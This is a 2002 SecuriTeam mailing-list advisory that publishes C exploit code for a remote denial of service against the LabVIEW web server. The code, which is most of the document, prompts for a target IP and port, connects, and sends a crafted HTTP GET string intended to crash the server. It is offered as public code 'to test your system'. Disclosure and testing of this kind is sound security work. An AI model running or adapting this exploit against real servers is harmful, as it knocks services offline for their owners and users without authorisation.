[EXPL] LabVIEW Web Server DoS Vulnerability Exploit Code Released

From: support@securiteam.com
Date: 05/03/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Fri,  3 May 2002 14:04:36 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  LabVIEW Web Server DoS Vulnerability Exploit Code Released
------------------------------------------------------------------------

SUMMARY

The LabVIEW application is an integrated development system for creating
LabVIEW programs, which are called Virtual Instruments or VIs. The LabVIEW
application can run, or host, VIs in its own environment. The LabVIEW
application can also host its own Internet servers, including an HTTP or
Web server. LabVIEW also has extensive libraries to interface with
real-world test and measurement equipment, as well as mechanical motion
control and process control equipment.
The following is an exploit code that can be used to test your system for
the mentioned vulnerability, for more information about this vulnerability
please look into our previous article:
<http://www.securiteam.com/securitynews/5VP0L1F6UM.html> LabVIEW Web
Server DoS Vulnerability.

DETAILS

Exploit:
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

  /*This is a remote DoS exploit for LabVIEW web server.
    Remember that the logging function must be enabled
    for this *** to work, and the version is 5.1.1 - 6.1(which I think is
the newest realase)
    **THIS*IS*A*PUBLIC*EXPLOIT
      *IF YOU MODIFY THIS CODE PLEASE SEND IT TO: bl0wfi5h@hotmail.com* */
      
int main(int argc, char** argv[])
{
     int sockfd;
     struct sockaddr_in dest_addr;
     
     char ipaddress[18];
     int portnumber;
     
     char dosstring[30]= "GET\\s/\\sHTTP/1.0\\n\\n"; //The dOS string
     int bytes_sent;
           
     printf("\nSelect what server you want TO attack(IP): ");
     scanf("%s", ipaddress);
     printf("\nSelect the server port(default www port 80): ");
     scanf("%d", &portnumber);
     dest_addr.sin_family = AF_INET;
     dest_addr.sin_port = htons(portnumber);
     dest_addr.sin_addr.s_addr = inet_addr(ipaddress);
     memset(&(dest_addr.sin_zero), '\0',8);

     if((sockfd = socket(AF_INET, SOCK_STREAM, 0))== -1)
     {
       printf("Socket Error");
       exit(1);
     }
     
     connect(sockfd, (struct sockaddr *)&dest_addr, sizeof(struct
sockaddr));
     
     bytes_sent = send(sockfd, dosstring,sizeof(dosstring), 0);
     
     for(; bytes_sent == 0;)
     {
       printf("problem sending string, check if the host is up");
       exit(1);
     }
     printf("\nDONE! You have send: ");
     printf("%d", bytes_sent);
     printf(" BYTES!");
     close(sockfd);
     
     printf("\n\n:::EXPLOIT:CODE:BY:JONAS:NYBERG:\n\n");
     printf("\nCONTACT INFO: bl0wfi5h@hotmail.com\n");
     return 0;
     
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:bl0wfi5h@hotmail.com>
bl0wfi5h and <mailto:digiover@dsinet.org> Jan Reilink of www.DSINet.org.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.